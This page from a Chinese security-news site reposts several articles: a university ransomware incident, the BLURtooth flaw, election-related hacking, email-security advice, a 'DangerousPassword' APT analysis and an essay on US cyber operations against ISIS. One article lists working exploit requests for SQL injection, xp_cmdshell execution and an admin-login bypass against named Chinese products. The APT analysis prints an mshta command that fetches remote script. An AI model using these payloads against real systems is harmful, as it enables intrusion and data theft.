微慑信息网

业界快讯 第9页

英国纽卡斯尔大学遭受DoppelPaymer勒索软件攻击,导致大量数据发生泄漏

微慑管理员阅读(1671)

快报!英国纽卡斯尔大学遭受DoppelPaymer勒索软件攻击,导致大量数据发生泄漏

 

事件报道
英国纽卡斯尔大学表示,在2020年08月30日上午,学校的网络系统遭到了DoppelPaymer勒索软件的攻击,该勒索软件成功入侵学校系统并迫使系统下线,而让学校IT服务重新上线则需要花费数周的时间。
目前,英国警方和英国国家犯罪调查局正在跟英国纽卡斯尔大学信息技术服务部(NUIT)合作,共同对这起网络攻击事件展开调查。
英国纽卡斯尔大学在其发布的事件公告中表示称:“在2020年8月30日星期日,我们发现学校的网络系统遭受了一次严重的网络攻击,此次攻击导致我们学校的网络系统和IT系统出现了运营中断。除了通讯系统之外,我们学校其他所有的IT系统目前都出现了不同程度的拒绝服务情况。”
英国纽卡斯尔大学目前还没有决定是否会重置相关的账号以及密码,但是该校哦啊表示,他们可能会根据内部支持团队和第三方安全顾问给出的建议来进行账号以及系统重置。
英国纽卡斯尔大学在今天发表的一份最新报告中说到:“这种类型的网络攻击将给学校带来严重影响,并且这种情况还将持续一段时间,可能需要好几个星期的时间才能重新恢复所有网络系统以及IT系统的正常运转。”
英国纽卡斯尔大学的发言人在接受采访时表示,目前,针对此次网络攻击事件的调查仍处于早期阶段,英国纽卡斯尔大学IT部门的同事们也正在努力制定系统恢复方案,并给与英国警方和英国国家犯罪调查局的调查提供支持。在针对这起网络攻击事件的初步调查结束之前,我们还无法向外界透露有关此次事件的更多细节内容。
 
目前仅有少量IT服务处于可用状态

根据英国纽卡斯尔大学透露的信息,目前该校的大部分IT服务都已经处于离线状态,并且这种停止服务的状态还将持续一段时间,而剩下那些目前正在运行的IT服务很可能会在系统恢复期间随时被关闭。
英国纽卡斯尔大学在今天的事件公告中更新到:
  1. 学校的IT工作人员目前已经无法访问他们自己的IT账号了,而且短时间内仍然无法恢复对账号的访问权。
  2. 英国纽卡斯尔大学信息技术服务部(NUIT)可能随时需要访问用户正在使用的任意IT系统。
  3. 为了对此次网络攻击事件进行详细调查,我们可能需要移除部分受影响的PC计算机、服务器以及其他相关设备。
在事件的调查过程中,英国纽卡斯尔大学的师生将只能访问学校IT系统中的部分服务,其中包括Office365(电子邮件、Office应用和团队通信信道)、SAP核心服务(通过客户端访问,Web接口目前仍无法使用)和Zoom。英国纽卡斯尔大学还建议广大师生将自己上传至学校共享驱动中的重要文件拷贝至他们自己的OneDrive账号中。
英国纽卡斯尔大学在事件公告中提到:“在适当的情况下,我们建议大家将关键业务数据和文件复制并保存到个人OneDrive网盘之中。当然了,广大师生也可以根据自己的需要在自己的个人OneDrive网盘中创建和保存新的文件。需要注意的是,我们建议只将关键文件传送至网盘中,不要将全部文件复制或发送到您的个人账号下。如果你在英国纽卡斯尔大学工作,或者认识在那里工作的人,可以通过+16469613731与我们联系。”

勒索软件DoppelPaymer声称对此次攻击事件负责
虽然英国纽卡斯尔大学只对外声称自己遭受到了网络攻击,但是他们并没有透露此次攻击是由谁发动的。随后,DoppelPaymer勒索软件的运营商发表声明称,他们就是此次网络攻击事件的幕后黑手,并声称对此次攻击事件负责。
DoppelPaymer勒索软件的运营商还在数据泄露网站Dopple Leaks上分享了一份大小为750KB的被盗数据来作为此次入侵事件的证据,在2020年2月份的Maze勒索软件攻击活动中,他们也采用了类似的策略。
DoppelPaymer是一款功能强大且杀伤力巨大的勒索软件,早在2019年6月中旬开始,它就一直以企业组织作为其主要的攻击目标。一般来说,DoppelPaymer勒索软件首先会想办法获取到目标网络系统的管理员凭证,并利用这些凭证来入侵目标组织的整个网络系统,然后将勒索软件Payload部署到所有设备之中。
快报!英国纽卡斯尔大学遭受DoppelPaymer勒索软件攻击,导致大量数据发生泄漏
当然了,勒索软件的主要目的还是要向目标用户勒索数据赎金,而DoppelPaymer勒索软件同样以勒索巨额赎金而“闻名于世”,因为DoppelPaymer勒索软件已经成功入侵并加密了成百上千个系统了。
2019年11月,墨西哥国有石油公司PEMEX(Petróleos Mexicanos)就受到了DoppelPaymer勒索软件的攻击,并被勒索价值490万美元的比特币来作为解密文件的数据赎金。
实际上,DoppelPaymer勒索软件是基于BitPaymer开发的,并且引用了BitPaymer中的大部分代码,但是DoppelPaymer勒索软件的运营商已经对该恶意软件进行了多次升级更新,并对加密线程进行了优化,以加快其数据加密速度。
 

译文声明

译文仅供参考,具体内容表达以及含义原文为准。

原文始发于微信公众号(安全客):快报!英国纽卡斯尔大学遭受DoppelPaymer勒索软件攻击,导致大量数据发生泄漏

HW第一天:今日0day利用大全

微慑管理员阅读(3544)

天融信TopApp-LB 负载均衡系统sql注入

HW第一天:今日0day利用大全

POST /acc/clsf/report/datasource.php HTTP/1.1Host:Connection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*X-Prototype-Version: 1.6.0.3X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57Content-Type: application/x-www-form-urlencodedContent-Length: 201 t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。 

用友GRP-u8 注入

POST /Proxy HTTP/1.1Accept: Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: hostContent-Length: 357Connection: Keep-AliveCache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

绿盟UTS综合威胁探针管理员任意登录

漏洞详情:

绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。

处置意见:

建议尽快更新补丁至最新: http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

漏洞利用过程:

HW第一天:今日0day利用大全

HW第一天:今日0day利用大全

 

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

HW第一天:今日0day利用大全

HW第一天:今日0day利用大全

HW第一天:今日0day利用大全

利用渠道的md5值去登录页面

HW第一天:今日0day利用大全

7ac301836522b54afcbbed714534c7fb

 

成功登录,登录后通过管理员权限对设备进行管控,并且可以看到大量的攻击信息,泄露内部网络地址包括资产管理。

 

 

 

WPS

HW第一天:今日0day利用大全

 

参考:zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

 

 

原文始发于微信公众号(F11Team):HW第一天:今日0day利用大全

蓝牙 BLURtooth 漏洞让攻击者覆盖蓝牙认证密钥

微慑管理员阅读(1700)

 

蓝牙无线技术背后的组织今天发布了关于设备供应商如何缓解对蓝牙功能设备新攻击的指南。新发现的BLURtooth是蓝牙标准中一个名为Cross-Transport Key Derivation(CTKD)组件中的漏洞。该组件用于在两个蓝牙功能设备配对时协商和设置认证密钥。
该组件的工作原理是为蓝牙低能(BLE)和基本速率/增强数据速率(BR/EDR)标准设置两套不同的认证密钥。CTKD的作用是准备好密钥,让配对的设备决定他们要使用什么版本的蓝牙标准。它的主要用途是蓝牙 “双模式 “功能。
但根据蓝牙特别兴趣小组(SIG)和卡内基梅隆大学CERT协调中心(CERT/CC)今天发布的安全通告,攻击者可以操纵CTKD组件覆盖设备上的其他蓝牙认证密钥,并允许通过蓝牙连接的攻击者访问同一设备上的其他蓝牙功能服务/应用。
在某些版本的BLURtooth攻击中,认证密钥可以被完全覆盖,而其他认证密钥可以降级使用弱加密。所有使用蓝牙4.0到5.0标准的设备都有漏洞。蓝牙5.1标准带有可以激活和防止BLURtooth攻击的功能。
蓝牙SIG组织官员表示,他们开始通知蓝牙设备的供应商关于BLURtooth攻击,以及他们如何在使用5.1标准时减轻其影响。在撰写本文时,补丁还没有立即可用。防止BLURtooth攻击的唯一方法是控制蓝牙设备配对的环境,以防止中间人攻击,或通过社会工程(欺骗人类操作员)与流氓设备配对。
不过,蓝牙SIG组织预计在某个时间点会有补丁,并且被集成作为固件或操作系统更新提供给蓝牙备。目前,这些更新的时间表还不清楚,因为设备供应商和操作系统制造商通常在不同的时间表上工作,一些设备供应商和操作系统制造商可能不会像其他供应商那样优先考虑安全补丁。
用户可以通过检查固件和操作系统的发布说明,查看CVE-2020-15802,即BLURtooth漏洞的bug标识,来跟踪他们的设备是否已经收到BLURtooth攻击的补丁。根据蓝牙SIG的说法,BLURtooth攻击是由洛桑联邦理工学院(EPFL)和普渡大学的两组学者独立发现的。

 

原文始发于微信公众号(安全圈):【安全圈】蓝牙 BLURtooth 漏洞让攻击者覆盖蓝牙认证密钥

微软:多个国家背景的黑客组织干扰今年美国大选

微慑管理员阅读(1708)

 

微软的一份报告表示,俄罗斯,伊朗等国家的黑客组织正在攻击参与今年美国总统大选的组织和个人。
微软客户安全副总裁汤姆·伯特(Tom Burt)表示,这些攻击者不仅针对候选人和竞选人员,而且针对他们背后的咨询团队。
最近几周,与俄罗斯有联系的网络间谍组织Strontium(也被称为Sofacy,APT28,Fancy Bear,Sednit),攻击了与美国大选直接或间接相关的200多个组织。这个组织因2016年攻击美国大选而闻名,他们的工作重点是窃取目标的凭据并破坏其帐户,并收集情报进行攻击,以破坏美国大选。
伊朗黑客组织Phosphorus(又名Rocket Kitten,Newscaster)攻击了与特朗普竞选活动有关的多个个人账户。微软在2020年5月至6月间发现了该组织试图登录特朗普竞选助手和美国政府官员的账户,但收效甚微。
不过,微软表示,对与特朗普和拜登竞选活动有关的人的攻击并未成功。
知情人士也表示,黑客此次的攻击手段包括了网络钓鱼(一种试图诱骗用户泄露密码的方式)及其他能够渗入SKDK网络系统的手段。

【安全圈】微软:多个国家背景的黑客组织干扰今年美国大选

9月11日外交部例行记者会,有记者就外媒报道微软公司称有中国黑客攻击美国总统竞选网站一事提问。
外交部发言人赵立坚表示,关于美国大选,我多次说过美国大选是内部事务,我们没有兴趣,也无意干涉。近日多名美国情报官员向美国媒体表示,美国情报机构并没有看到中国干预美国大选的证据。美国微软公司不应该无中生有,不应该硬拿中国说事。
赵立坚强调,长期以来,美国政府和有关企业违反国际法和国际关系准则,对外国政府企业或者个人,实施大规模有组织无差别的网络窃密、监控、攻击、制造混乱,世人皆知。世界各国都应该保持高度警惕,防止美国高科技公司通过安装“后门”,从外国收集个人数据,并将其传回美国情报机构。从“维基解密”到斯诺登事件,从“方程式组织”到“梯队系统”,事实证明美国才是全球最大的网络攻击者,是名副其实的“黑客帝国”“窃听帝国”“间谍帝国”。

原文始发于微信公众号(安全圈):【安全圈】微软:多个国家背景的黑客组织干扰今年美国大选

“危险密码”APT组织 炎炎夏日再活跃

微慑管理员阅读(2368)

TAG:高级可持续攻击、危险密码、Lazarus、中国、NHT Global、UMKC、金融

TLP白(报告转发及使用不受限制)

日期:2020-08-24

概述
近日,微步情报局监测发现一批针对国内外企业金融交易相关业务的定向攻击活动,经过深度关联分析,该批次攻击事件的幕后组织为微步在线2019年11月披露的危险密码(DangerousPassword)APT组织。具体情况如下:
  • 本批次鱼叉式网络攻击事件中,投递载荷均为Lnk文件,在自释放(或通过谷歌在线文档下载)诱饵文档后,远程下载执行具有后门功能的javascript恶意代码。
  • 使用的诱饵文件包括中文类型的“奖金计划(2020年7月).docx”、“奖金计划(2020年8月).docx”以及“Project Management Plan.pdf”等。相关企业包括然健环球(中国)日用品有限公司(NHT Global)、美国密苏里大学堪萨斯分校(UMKC)。推测本次攻击时间段为2020年6月下旬至今。
  • 微步在线威胁检测平台(TDP)、威胁情报管理平台(TIP)、DNS防火墙(OneDNS)、威胁情报云API均已支持该团伙最新攻击的检测。如需协助,请与我们联系:[email protected]

详情
微步在线2019年首次披露危险密码APT组织时,攻击者投递的攻击载荷为加密的docx文件以及恶意的“Password.txt.lnk”文件两部分;在本次攻击事件中投递载荷形式稍有调整,由一个大体积的Lnk文件或涉及多步网络下载交互的Lnk文件直接实现攻击。攻击的目标行业基本维持一致,依然集中在金融交易相关的行业或业务部门。

托管于谷歌在线文档的诱饵文档内容如下所示。文档主题为然健环球(中国)日用品有限公司相关的奖金计划。

“危险密码”APT组织 炎炎夏日再活跃

用户PC端下载后展示如下:

“危险密码”APT组织 炎炎夏日再活跃

 

美国密苏里大学堪萨斯分校(UMKC)相关的诱饵文档如下。文档讲述了苏里大学堪萨斯分校师生使用Roo Bucks交易账户相关的Roo Balance应用程序设计框架。 
“危险密码”APT组织 炎炎夏日再活跃

样本分析

 
攻击者投递的原始攻击载荷为压缩文件,解压后为具备下载执行功能的Lnk文件。
“危险密码”APT组织 炎炎夏日再活跃

Lnk文件命令行执行C:WindowsSystem32mshta.exe https://bit[.]ly/3aCBejA,短域名中转后的真实域名为shop.newsbtctech[.]com。Lnk文件中可见嵌入的docx文件。

“危险密码”APT组织 炎炎夏日再活跃

远程执行的Jscript如下所示,通过谷歌在线文档获取诱饵文档内容,内嵌的payload资源经base64解码落地,然后带参执行。

“危险密码”APT组织 炎炎夏日再活跃

落地bpwez.js如下,传递参数为C&C地址,https://bit[.]ly/2NIurtU,短域名将跳转到真实C&C地址,newsbtctech.com。通过自定义随机函数生成用于标识中马PC的ID,将该ID发送至C&C服务器,然后进入后门执行的死循环代码,每15秒检查执行一次C&C服务器发送的payload。

“危险密码”APT组织 炎炎夏日再活跃

整体执行流程与历史披露的攻击事件中的流程基本一致。后续C&C服务器下发插件当前暂未捕获,可参考微步在线2019年11月发布的独家披露报告。

关联拓线

1. 样本维度关联

通过lnk文件结构中用于标识文件生成的机器平台MachineID进行拓线关联。

“危险密码”APT组织 炎炎夏日再活跃
关联样本如下:
样本名称 Hash 下载URL 真实域名
Project Management Plan.pdf.lnk 0d79b66f41858a336a385a7f6cc9e4e2fa06097b0ec422ce2d18bc6eabe5afee https://bit.ly/2Bsovmg drop.trailads.net
Project Management Plan.pdf.lnk d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805 https://bit.ly/3eIxLAZ drop.trailads.net
奖金计划(2020年8月).docx.lnk effd76c58906877364ad6c62ff7d8d711c83b78306e31350610a14b6610cdf1e https://bit.ly/3aCBejA shop.newsbtctech.com
Password.txt.lnk ca7e5275bf45970688d3b42424f5a130d59bef2f15993b95f6438eaa37a7801f https://bit.ly/2tsXyue share.onedrvfile.site
分析确认所关联样本均为危险密码组织攻击样本,但当前多数下载URL失效。

 

2. 网络资产拓线

通过newsbtctech.com C&C域名的历史DNS解析数据进行拓线关联。
“危险密码”APT组织 炎炎夏日再活跃
通过对关联域名whoise信息、pdns数据、关联样本等多维度关联比对,上述关联域名均为危险密码最新的网络资产。
微步在线全线产品当前已支持此次攻击事件的实时检测。

“危险密码”APT组织 炎炎夏日再活跃

“危险密码”APT组织 炎炎夏日再活跃

3. 同期,芬兰安全公司F-Secure对危险密码APT组织追踪发现,Javascript后门在后续会通过一段C&C下发的powershell下载最终的二进制木马,木马与卡巴斯基曾披露的Bluenoroff(Lazarus组织的一个分支)组织所使用的特马高度相似,由此可以推测,微步在线所披露的“危险密码”APT组织与Bluenoroff组织存在一定关联,结合其特定的攻击目标、攻击目的来看,危险密码”APT组织极有可能为Lazarus APT组织的一个分支机构。

原文始发于微信公众号(安全威胁情报):“危险密码”APT组织 炎炎夏日再活跃

锅传锅,从万茜“被盗号”专业剖析如何防范“邮箱账号被盗”风险

微慑管理员阅读(1845)

近几日,万茜锅传锅事件上了热搜。万茜回应此前的点赞行为因“账号被盗”。而涉事平台Z表示“因为万茜的W邮箱被盗,导致其Z平台账号被盗”。

考虑到当前大多数平台账号需绑定邮箱,且通过邮箱账号登陆、验证平台账号安全、修改密码等,如果邮箱账号被盗,确实极易导致其关联的众多平台账号“被盗”。因此锅传锅事件中谁在甩锅且抛到一边,作为一名网络安全从业人员,我们从专业角度来剖析,如何防范“邮箱账号被盗”风险。

锅传锅,从万茜“被盗号”专业剖析如何防范“邮箱账号被盗”风险

万茜回应的盗号声明

鉴于电子邮件在信息化时代的重要地位,20179月,公安部、工信部、国家保密局三部委曾联合下发“党政机关事业单位和国有企业互联网电子邮件系统安全专项整治工作通知”。20189月,工信部网络安全管理局预警“监测发现近十万个互联网用户邮箱疑似被黑客控制,并用来发送垃圾邮件,相关邮箱的账号和密码很可能已泄露或被窃取,存在被进一步窃密或实施钓鱼攻击的风险。”邮件安全问题,尤其是“邮件账号安全”问题成为人们关注的焦点。

具体到防范“邮箱账号被盗”,建议在日常网络安全运营工作中做好以下邮件风险监测,防止攻击者“悄悄地来了,又悄悄地走了,并挥挥手留下不明操作若干”。

  • 弱口令密码:

“弱口令密码”始终是邮件安全管控最头疼的问题之一。虽然安全人员一再强调弱口令密码的风险,但仍然屡禁不止。用户觉得“弱密码方便记忆”,同样攻击者也觉得“弱密码好破解”。

传统“弱密码字典”和密码轻度检测等手段,可基本解决传统意义上的“简单”弱口令,如“admin123”。但是,一方面,安全人员的字典无法有效覆盖攻击者的字典,另一方面基于姓名、生日等组合而成的“社工弱密码”,以及基于键盘布局的弱密码等可能无法被有效识别。而通过利用攻击者视角,可有效消解这种“攻防的不对等”,加大对弱密码检测的广度与深度,满足“弱密码”风险识别的需求。

 

  • 暴力破解:

既然邮箱弱口令密码广泛存在,门槛极低的“暴力破解”自然成为了攻击者快速大量获取邮箱账号的有效途径。

实时了解有哪些IP正在暴破邮箱资产,是“单点暴破”(单点IP不断尝试暴破)还是“分布式爆破”(通过控制的大量不同主机尝试暴破),并且实时掌握有哪些邮箱资产已经被暴破成功至关重要。这需要根据邮箱账号暴破的特点,建立暴力破解模型,有效识别“单点暴破”“分布式暴破”等暴破方式,以便网络安全管理员快速进行应急处理,防止攻击者利用被控的可信邮箱账号搞事情。

 

  • 异常登录:

异常登陆包括登陆时间异常、登陆地点异常,比如非外勤人员的邮箱账号在外地甚至境外登陆,或者在凌晨3点等非工作时间登陆。

要掌握邮箱账号资产,必须对邮箱账号的登录地点、登录时间进行监控,有任何异常登录行为及时告警,从而最大限度地降低邮箱账号被控带来的损失。

 

  • 异常操作:

获取邮箱账号密码登陆权限只是黑客攻击的第一步,后续往往还会伴随窃取机密,发送垃圾邮件、钓鱼邮件等下一步动作。

通过分析攻击者利用被控邮箱采取的下一步动作,可以找到作案痕迹,并了解攻击者控制邮箱的目的意图。例如,如果发现存在大量发送重要文件、垃圾邮件、威胁邮件,可疑邮件代收等异常行为,邮箱账号极有可能已被攻击者控制。这种情况下时效性尤为重要,需要对域内账号行为实时监控,第一时间发送警告,并采取有效应急响应措施降低损失。

针对以上内容,睿眼·邮件攻击溯源系统均有专门的模块对其进行监控,覆盖可疑域内账号、风险主机、弱密码、暴力破解、分布式破解、异常登陆、多账号登陆、登陆信息、加密流量、源端口异常等场景,有效防范“邮箱账号被盗”风险,防止可信的邮箱用户为攻击者“背锅”。

锅传锅,从万茜“被盗号”专业剖析如何防范“邮箱账号被盗”风险

睿眼·邮件攻击溯源系统 资产监控页面

原文始发于微信公众号(中睿天下):锅传锅,从万茜“被盗号”专业剖析如何防范“邮箱账号被盗”风险

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

微慑管理员阅读(1873)

本文字数:5514字

阅读时间:17分钟

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

编者按

美国联合特遣部队ARES指挥官发表研究文章,分析美军网络部队打击“伊斯兰国”行动的成功要素,并提出应将此次作战的经验进一步应用于大国竞争。

文章提出,此次战役行动提供的经验教训是,美军需要从专门规划和执行针对敌方的大型作战行动转变为当下就与其开展竞争、利用机会在常规战斗发生前与敌手作战以及与强大的国内外伙伴网络共同努力。为此,美军需要建立一支可以同时在“作战区域”和“灰色地带”开展作战的部队。

美军需要同时具备与作战区域外对手开展竞争和控制作战区域内物理冲突的能力,这样才实现“持续交战”所需的姿态和作战敏捷性;在灰色地带开展竞争活动可以提供独特的作战优势,这在信息环境体现得尤为显著,使得美军可以在战斗前、战斗中和战斗后同步运用物理和信息军事力量;美军应采取“立即作战”方式扩大与大国竞争空间,对抗和削弱对手当前的灰色地带活动,从而持续向对手施加成本和破坏;美军应与国防部外的相关伙伴紧密合作,运用军方的规划和指挥控制能力来解决跨地理区域复杂问题;美军需要摆脱军方积极作用仅限于突发情况的思维,要运用网络作战以及更广泛的信息环境作战,以最大程度地开展大国竞争。奇安网情局编译有关情况,供读者参考。

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

我们已经深入敌后:与“伊斯兰国”开展秘密在线作战的经验教训

“伊斯兰国”关键宣传者被通过导弹袭击从战场清除,“圣战”网站服务器文件和档案丢失,“伊斯兰国”领导及拥护者就正统问题互相争斗:这些只是美国网络司令部针对“伊斯兰国”高度机密战斗实际效果的一部分。尽管很容易被新颖性和技术细节所吸引,但这场斗争不仅仅是使用互联网针对“伊斯兰国”分支机构开展的细散、独立行动的总和。这是一场将传统作战区域(combat zones)内外行动结合在一起的多年战役。更重要的是,从战斗中汲取的教训——从专门规划和执行针对敌方的大型作战行动转变为与其开展当下竞争、利用机会在常规战斗发生前与敌手作战以及与强大的国内外伙伴网络共同努力——正是美国从欣赏大国竞争问题迈向寻求解决方案所需要的。

我们曾在联合特遣部队ARES服役,一个美国网络司令部辖下、由海军陆战队领导的联合部队,因为该部队了解如何持续与“伊斯兰国”宣传机器和战场部队开展作战。这种经验告诉我们,美军可以开展并支援打击敌人全部努力的战役,无论他们是否专注于常规军事行动。这不仅与海军陆战队《2030年部队设计》工作的各个方面以及海军陆战队司令最近对低于武装冲突阈值的恶意活动的重视相一致,而且联合部队还可以将与“伊斯兰国”战斗所学应用于大国竞争。这样做需要在与敌方军事力量进行决战之外进行思考,接受上述战争中存在的竞争和政治进程。这需要一支既可以在作战区域又可以在灰色地带(gray zones)作战的部队。在传统作战区域,目前强调的建立“更具杀伤力的联合部队”意味着聚焦摧毁和消灭敌方的军事力量,同时确保自身的生存能力。虽然“灰色地带”的定义比比皆是,但共同的主题是实现政治和战略目标,同时避开此类作战区域。

简而言之,我们需要一支部队,不仅准备好今晚在可能的作战区域内作战,而且当下还要能在灰色地带主动参与并竞争。设计一支能够同时做到这两者的部队是许多人(包括海军陆战队司令戴维·伯杰将军)最近强调的一个棘手问题。我们认为,联合特遣部队ARES经过数年打击“伊斯兰国”行动改进的方法提供了适用于整个联合部队的解决方案。作为奖励,这些都是海军陆战队可以尝试并立即实施的变更,而无需等待2030年重新设计的部队。

一、联合特遣部队ARES

最近的文章、访谈和播客以前所未有的方式深入探讨了针对“伊斯兰国”的秘密在线战斗(被称为“发光交响曲行动”)。但是,他们对技术能力的关注掩盖了有效灰色地带竞争的关键方面。当美国网络司令部于2016年成立该特遣部队时,“伊斯兰国”通过手机和互联网以“闪电战”的方式赢得了信息战:使伊拉克军队士气低落,从远方招募拥护者,并煽动全球“圣战”。“发光交响曲”是美军打击“伊斯兰国”全球信息系统解决方案的一部分。这是为期一个月的战役,充分利用了与其他联合、跨机构和盟友部队密切协作的军事力量的物理和信息两大方面。持续混合的物理和信息力量(作战区域内外)运用降低了“伊斯兰国”媒体的数量和质量。尽管为动能打击和地面机构提供支持很重要(这吸引了常规军事思想家最多注意力),但这并不是特遣部队持久成功的基础。

相反,特遣部队的成功源于其追求并保持接触敌方系统多个要素的能力,包括与战场部队没有直接联系的要素。“伊斯兰国”宣传机器的组成要素遍及全球:指导宣传工作的关键人员位于中东,但制作资料的分支机构、传播印刷品的分发机构以及托管数字资料的服务器则分散在欧洲、非洲、中亚和东南亚以及其他区域。尽管宣传系统的要素存在于官方作战区域之外,但它们对于伊斯兰国在战场上的成功至关重要。这种与作战区域外的对手竞争并同时控制作战区域内的物理冲突的能力是联合部队为实现《国防战略》中要求的持续对手交战所需的姿态和作战敏捷性。

二、不能躲开灰色地带

“发光交响曲”展示了军队在传统观念的作战区域内外部与敌方作战的需求和能力。虽然灰色地带活动通常被视为旨在避免升级的策略,但如果将其纳入整体战役中,它们即使在升级后可以保持关联性。当海军陆战队在2018年承担指挥与“伊斯兰国”的在线战斗时 ,以美国为首的联盟正处于在伊拉克和叙利亚战场上击败伊斯兰国的风口浪尖上。我们认识到持续的成功需要破坏“伊斯兰国”不断发展的国际网络,包括推动者、支持者和附属团体,因为其原始国家已经崩溃。一支专门支持作战行动和攻击“伊斯兰国”在作战区域外的复杂媒体系统的部队为我们提供了令人印象深刻的作战优势,如果我们只专注于武装冲突地区,我们将错失这种优势。

识别并破坏“伊斯兰国”在伊拉克和叙利亚以外的推动者网络的各个要素(如其宣传和后勤支持系统)的运作,可以更好地感知攻击机会,从而打击仍在开展直接传统战斗的“伊斯兰国”部队。由于联合特遣部队帮助清除了持续维持“伊斯兰国”战斗部队的资源,或者确定了这些部队与其支持者之间的联系,可以用来在组织中造成内部冲突,从而加速了该组织的物理失败。此外,对整个敌人系统的感知和交战使军方能够在“伊斯兰国”在全球范围内转移努力时,与其保持同步并施加压力。我们想不到有比识别、追踪和攻击最脆弱“伊斯兰国”力量元素更相关的联合部队能力,无论其是否处于已宣布的作战区域内。

信息环境作战是联合部队应用上述经验的显著位置。《2020年国防授权法案》授权军方在“缺乏敌对行动和……处于敌对行动区域以外”的信息环境中开展行动。信息环境为战斗前、战斗中和战斗后的物理和信息军事力量的同步应用提供了多种途径。

特遣部队的战役强调了敌对系统内的非传统目标,例如促进宣传、招募和后勤工作的网络(但仍远离作战区域)。这是“长远眼光”的有效例证,即联合部队需要创造对抗敌方弱点的机动空间,并在发生冲突时挫败目标选择和决策周期。

三、战役需要在战斗前做好准备

乍看之下,与“作战区域”相比,定义“灰色地带”似乎偏离了通过拒止来提高杀伤力和有效威慑。我们的经验恰恰相反:对抗敌方系统的广度可以带来更好的战役和战略成果。因为我们的计划和战斗人员熟悉对手的多个方面,所以他们可以发现联系和机会以利用漏洞,否则漏洞就会被错过。通过在灰色地带持续竞争,美军和伙伴部队可以在战斗开始前施加成本和破坏,同时增强在物理域的战斗能力。换句话说,我们的经验支持一种更细微的方法来考虑通过拒止进行威慑,也可以称赞为“通过探测进行威慑”方法。

具体来说,在网上与伊斯兰国的斗争表明,在敌对行动爆发之前,采用灰色地带行动当下就会施加成本。更重要的是,在随后发生实战的情况下,这些相同的努力可以同时增强部队的作战能力,使这些部队在战场交战中施加更大的成本。

我们可以将这种逻辑和方法扩展到在冲突前执行各种行动的联合部队。通过“立即作战”(fight now)方式扩大与大国竞争空间,美军可以对抗和削弱对手当前的灰色地带活动,在需要战斗时使部队操纵对手的行为,更好地做好作战准备并赢得下一场冲突。

四、与非传统合作伙伴并肩战斗

对于像“伊斯兰国”这样的全球对手,网络任务部队只能靠自己做很多事情。同样,海军陆战队(甚至是联合部队)不可能在任何所需地方与国家力量竞争。因此,有效的竞争活动,无论是作为国家力量的主要手段还是广泛国家方针的支持,都需要与国防部以外的合作伙伴密切合作。联合部队,特别是海军部队,提供了作战环境的独特部署和渠道,跨机构和外国合作伙伴可以利用这些作战环境来瞄准敌方系统的脆弱部分。它们还具有强大的指挥控制能力,非常适于与合作伙伴开展计划——无论是向外国军事力量或执法部门提供信息(“提示”),为经济制裁提供建议目标,还是整合美国国家力量的另一要素。结果是真正针对敌方系统的组合“武器”,而这在独自的情况下这是不可能的。在联合特遣部队ARES,我们每天都在经历这种情况,因为敌方系统中的访问通常是盟友或跨机构合作伙伴运用其权限或能力所需要的。与特定盟军和跨部门办公室的合作伙伴关系使我们能够利用和协调合作伙伴的影响力和行动,其范围涉及从动能到执法,到经济,到信息。该网络可使特遣部队和合作伙伴共同努力来影响敌方系统的节点,而这是美国军方无法企及的。

与国防部外的相关伙伴紧密合作立即适用于联合部队。当在对手所利用的地理和功能性缝隙中开展行动时,合作伙伴机构将愿意(如果不是渴望)具有计划能力的组织来领导所需协调。由于制定了具有规划行动的战役计划(相比于提供广泛指导而没有细节的战略计划),联合特遣部队经常充当协调活动并围绕这些缝隙发展综合方针的实际枢纽。国防部特别善于将指挥控制能力运用于解决跨地理区域复杂问题,同时与跨机构组织和联盟国家的合作伙伴协同工作。

五、在重新设计部队的同时立即在灰色地带交战

时间是最宝贵的。联合部队,特别是海军陆战队,不能等到冲突出现后再实施灰色地带行动。“立即战斗”通过有意愿和有能力的合作伙伴提高了杀伤力,提供了更多战略选择,并扩大了影响范围。那么,海军领导人应如何执行《国防战略》、颁布《2030年部队设计》,以及“ 对灰色地带作战的挑战做出有效响应 ?” 第一步是更多地介入灰色地带,摆脱美国军方的积极作用仅限于突发情况的思维。

